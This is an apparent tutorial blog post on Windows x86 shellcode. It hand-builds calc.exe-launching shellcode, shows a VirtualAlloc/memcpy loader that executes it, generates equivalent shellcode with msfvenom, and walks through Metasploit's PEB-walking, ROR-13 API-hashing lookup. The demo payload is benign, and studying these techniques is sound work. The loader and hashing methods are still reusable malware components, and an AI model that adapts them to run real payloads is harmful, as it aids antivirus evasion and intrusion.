When I first started in the industry, I saw shellcode everywhere. Staring at those raw bytes, with the Neo poster from The Matrix on my wall, I gradually became fascinated. Shellcode is flexible and is often used for antivirus evasion and vulnerability exploitation. So how do we extract and load shellcode, and how does msf implement its shellcode?
0x01 Shellcode Basics
Shellcode is machine code, usually written out as a string of hexadecimal bytes. To get a feel for what it is, let's look at a simple program that opens the calculator, calc.exe.

#include "stdafx.h"
#include <windows.h>
int main(int argc, char* argv[])
{
WinExec("calc",1);
return 0;
}
A very simple program: it calls the Windows API WinExec to open the calculator. Now let's look at it under dynamic debugging in OD (OllyDbg).
push 0x1 ; On x86, arguments are passed on the stack; this pushes 1, the second argument of WinExec("calc",1)
push OpenCalc.00406030 ; Push the address of the "calc" string, the first argument
call dword ptr ds:[<&KERNEL32.WinExec>] ; Call WinExec under KERNEL32
The problem
Take the machine code of these three instructions and write it as a C string: "\x6A\x01\x68\x30\x60\x40\x00\xFF\x15\x00\x50\x40\x00". This is the kind of shellcode string we often see. If we load this string into memory, will it run successfully? I'm afraid not: we cannot guarantee that address 0x406030 holds the calc string in every program, nor that the import table entry at 0x405000 holds the address of WinExec.
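To see that both addresses really are baked into the bytes, here is a minimal C sketch that reads the two 32-bit operands back out of the string. The names snippet and read_le32 are made up for this illustration, and the offsets 3 and 9 assume the instruction layout shown above (6A imm8, 68 imm32, FF 15 addr32).

```c
#include <stdint.h>

/* The three instructions from the debugger, byte for byte. */
static const unsigned char snippet[] = {
    0x6A, 0x01,                         /* push 0x1               */
    0x68, 0x30, 0x60, 0x40, 0x00,       /* push 0x00406030        */
    0xFF, 0x15, 0x00, 0x50, 0x40, 0x00  /* call dword [0x405000]  */
};

/* Read a 32-bit little-endian value from a byte buffer. */
static uint32_t read_le32(const unsigned char *p)
{
    return (uint32_t)p[0]
         | ((uint32_t)p[1] << 8)
         | ((uint32_t)p[2] << 16)
         | ((uint32_t)p[3] << 24);
}
```

read_le32(snippet + 3) yields 0x00406030 and read_le32(snippet + 9) yields 0x00405000: both are absolute addresses that only make sense inside the original executable.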
0x02 Write a simple shellcode
Then Xiao Ming, always full of questions, asks: if we build the calc string ourselves and hardcode the WinExec address, will it run on the current machine? Let's try.
First, construct the calc string
xor ecx, ecx ; Set ecx to zero
push ecx ; Push the zero in ecx onto the stack to act as the string terminator \x00
push 0x636c6163 ; Reads "clac" as an immediate; stored little-endian, the bytes in memory spell "calc"
mov eax, esp ; Save the stack pointer, which now points to calc\x00, in eax
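If the byte order feels backwards, a small C sketch may help. It packs four characters into the 32-bit immediate that a push must carry so that the bytes land in memory in reading order. pack4 is a hypothetical helper written for this note; it assumes exactly four characters are passed.

```c
#include <stdint.h>

/* Build the push immediate for a 4-character chunk of a string.
 * The first character becomes the lowest byte, because x86 stores
 * the lowest byte of a dword at the lowest address. */
static uint32_t pack4(const char *s)
{
    return (uint32_t)(unsigned char)s[0]
         | ((uint32_t)(unsigned char)s[1] << 8)
         | ((uint32_t)(unsigned char)s[2] << 16)
         | ((uint32_t)(unsigned char)s[3] << 24);
}
```

pack4("calc") gives 0x636c6163, the value used in the push above.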
Get the WinExec address in Kernel32
There are two ways to obtain the address: through dynamic debugging, or through GetProcAddress.
Method one:
In the debugger, select the WinExec call, right-click, and follow it in the data window to read the WinExec address.
Method two:
#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
int main() {
    HMODULE Kernel32Addr;
    FARPROC WinExecAddr;
    // kernel32.dll is already loaded in the process, so a handle lookup is enough
    Kernel32Addr = GetModuleHandleA("kernel32.dll");
    printf("KERNEL32 address in memory: 0x%p\n", (void*)Kernel32Addr);
    // Only the address is printed, so the generic FARPROC type is sufficient
    WinExecAddr = GetProcAddress(Kernel32Addr, "WinExec");
    printf("WinExec address in memory is: 0x%p\n", (void*)WinExecAddr);
    getchar();
    return 0;
}
Construct the complete assembly code
section .data
section .bss
section .text
global _start
_start:
xor ecx, ecx ; Set ecx to zero
push ecx ; Push the zero in ecx onto the stack to act as the string terminator \x00
push 0x636c6163 ; Reads "clac" as an immediate; stored little-endian, the bytes in memory spell "calc"
mov eax, esp ; Save the stack pointer, which now points to calc\x00, in eax
inc ecx ; Set ecx to 1
push ecx ; Push the second parameter, 1
push eax ; Push the first parameter, the pointer to calc\x00
mov ebx, 0x7c86250d ; Hardcoded WinExec address obtained earlier (valid only on this machine)
call ebx ; Call WinExec
Save the above as xxx.asm. If you have no build environment on Windows, you can assemble and link it on Kali; the ELF output is only used to extract the instruction bytes. The commands are as follows:
nasm -f elf32 -o xxx.o xxx.asm
ld -m elf_i386 -o xxx xxx.o
Then disassemble the file with objdump -d xxx and print the bytes as a C string with the following command:
objdump -M intel -d xxx | grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
This gives us our shellcode.
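The later stages of that pipeline do nothing more than turn raw bytes into \x escapes wrapped in quotes. As an illustration of the same transformation, here is a small C sketch. format_c_string is a hypothetical helper written for this note, not part of objdump or msf.

```c
#include <stddef.h>
#include <stdio.h>

/* Format len bytes as a quoted C string literal such as "\x31\xc9".
 * Returns the number of characters written (excluding the NUL),
 * or -1 if the output buffer is too small. */
static int format_c_string(const unsigned char *code, size_t len,
                           char *out, size_t out_size)
{
    size_t need = len * 4 + 3;  /* 4 chars per byte, 2 quotes, 1 NUL */
    char *p = out;
    size_t i;

    if (out_size < need)
        return -1;

    *p++ = '"';
    for (i = 0; i < len; i++)
        p += sprintf(p, "\\x%02x", code[i]);
    *p++ = '"';
    *p = '\0';
    return (int)(p - out);
}
```

Feeding it the first three bytes 0x31, 0xc9, 0x51 produces the text "\x31\xc9\x51", quotes included, ready to paste into a loader.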
Load the shellcode
#include "stdafx.h"
#include <windows.h>
// Assembled bytes of the listing above, plus a trailing \x59 (pop ecx)
unsigned char shellcode[] =
"\x31\xc9\x51\x68\x63\x61\x6c\x63\x89\xe0\x41\x51\x50\xbb\x0d\x25\x86\x7c\xff\xd3\x59";
int main(int argc, char* argv[])
{
// Allocate executable memory and copy the shellcode into it
void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, shellcode, sizeof shellcode);
// Call the copied bytes as a function
((void(*)())exec)();
return 0;
}
Compile and run.
The calculator pops up, proving that Xiao Ming's idea works. Then Xiao Ming, still full of questions, asks: "What use is shellcode with a hardcoded address, which only works on this one machine?" Let's look at how msf's shellcode manages to work across different machines.
0x03 Analyze msf's shellcode
We will analyze msf's shellcode from a reverse engineering perspective. First, use msfvenom to generate shellcode with the same functionality as above.
msfvenom -p windows/exec cmd=calc.exe -f c
Compile it into our loader and reverse engineer the result.
#include "stdafx.h"
#include <windows.h>
// msf shellcode
unsigned char shellcode[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
int main(int argc, char* argv[])
{
void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, shellcode, sizeof shellcode);
((void(*)())exec)();
return 0;
}
OD reported errors when I tried to debug it, so I switched to WinDbg for dynamic debugging.
0x401000 is the main function (the start of the code section), where our loader code lives. It allocates memory through VirtualAlloc, which returns the address in eax, here 0x003A0000. memcpy then copies the shellcode variable from the .data section to 0x003A0000, and the loader calls it.
Stepping in, we find that the shellcode has been copied into memory and runs normally. I have annotated what each assembly step does.
The general process can be broken down as follows:
1. The leading call (relative offset 0x82) jumps over the API lookup routine and leaves that routine's address on the stack, where it is popped into ebp. The code then pushes parameter 1, the address of the 'calc.exe' string at the end of the shellcode (at the hardcoded offset ebp+0xB2), and the WinExec API hash 876F8B31, and calls the lookup routine
2. Walk the loaded-module list reached through the PEB to get the base address of a module
3. Parse the module's PE header; if it has no export table, move on to the next module and repeat from step 2
4. Parse the export table; if the number of exported names is 0, move on to the next module and repeat from step 2
5. Traverse the export name table, computing a hash from the module name and each exported name, and compare it with the requested hash to find the matching function, here WinExec
6. If no function matches, follow the linked list to the next module and repeat from step 2
7. Once WinExec is found, resolve its address and jump to it
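The offsets in step 1 can be checked by hand from the byte array itself. The C sketch below does the arithmetic; all names in it are mine. It assumes the standard encoding of a near call (opcode E8 followed by a 32-bit displacement relative to the next instruction), the 193-byte length of the array above, and the 0xb2 displacement seen in the bytes 8d 85 b2 00 00 00.

```c
#include <stddef.h>
#include <stdint.h>

/* Read a 32-bit little-endian value from a byte buffer. */
static uint32_t read_le32(const unsigned char *p)
{
    return (uint32_t)p[0]
         | ((uint32_t)p[1] << 8)
         | ((uint32_t)p[2] << 16)
         | ((uint32_t)p[3] << 24);
}

/* Offset reached by an E8 rel32 call located at call_off. */
static size_t call_target(const unsigned char *code, size_t call_off)
{
    int32_t rel = (int32_t)read_le32(code + call_off + 1);
    size_t next = call_off + 5;  /* the call instruction is 5 bytes long */
    return (size_t)((int64_t)next + rel);
}

/* First six bytes of the msfvenom output: cld; call +0x82 */
static const unsigned char msf_head[] = { 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00 };

enum {
    MSF_TOTAL_LEN   = 193,  /* bytes in the shellcode array           */
    API_STUB_OFFSET = 6,    /* return address of the call, kept in ebp */
    STRING_DISP     = 0xb2, /* displacement used by lea eax,[ebp+0xb2] */
    STRING_LEN      = 9     /* "calc.exe" plus its terminating zero    */
};
```

call_target(msf_head, 1) gives 0x88, the pop ebp that sits right after the lookup routine, and API_STUB_OFFSET + STRING_DISP equals MSF_TOTAL_LEN - STRING_LEN (0xb8), the first byte of calc.exe.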
What is particularly interesting here is the use of API hashes to find function addresses, a technique known as SFHA (Stephen Fewer's Hash API), which was the subject of a talk at DEFCON in 2017.
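As a sketch of how such a hash can be computed, the C code below mirrors my reading of the stub's bytes: for every byte, rotate the running value right by 13 bits and add the byte. The module name is hashed as uppercased UTF-16 including its terminator, the function name as ASCII including its terminator, and the two results are added. The function names are mine, and the code assumes an ASCII module name whose stored length covers a two-byte terminator.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Rotate a 32-bit value right by n bits (0 < n < 32). */
static uint32_t ror32(uint32_t v, unsigned n)
{
    return (v >> n) | (v << (32 - n));
}

/* Hash of the module name as the stub sees it: UTF-16LE bytes,
 * lowercase letters folded to uppercase, terminator included. */
static uint32_t module_hash(const char *name)
{
    uint32_t h = 0;
    size_t len = strlen(name);
    size_t i;

    for (i = 0; i <= len; i++) {        /* <= len: include the terminator */
        unsigned char c = (unsigned char)name[i];
        if (c >= 'a' && c <= 0x7f)      /* mirrors cmp al,'a' / sub al,0x20 */
            c -= 0x20;
        h = ror32(h, 13) + c;           /* low byte of the UTF-16 unit  */
        h = ror32(h, 13);               /* high byte, zero for ASCII    */
    }
    return h;
}

/* Hash of the exported function name: ASCII bytes, terminator included. */
static uint32_t function_hash(const char *name)
{
    const unsigned char *p = (const unsigned char *)name;
    uint32_t h = 0;
    unsigned char c;

    do {
        c = *p++;
        h = ror32(h, 13) + c;
    } while (c != 0);
    return h;
}

/* Combined value compared against the hash pushed by the caller. */
static uint32_t block_api_hash(const char *module, const char *function)
{
    return module_hash(module) + function_hash(function);
}
```

With these definitions, block_api_hash("kernel32.dll", "WinExec") evaluates to 0x876F8B31, the value pushed in step 1.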
0x04 Summary
As the saying goes, diligence is the path up the mountain of books, and hard work is the boat across the endless sea of learning. It still takes a lot of hands-on debugging to deepen one's understanding.
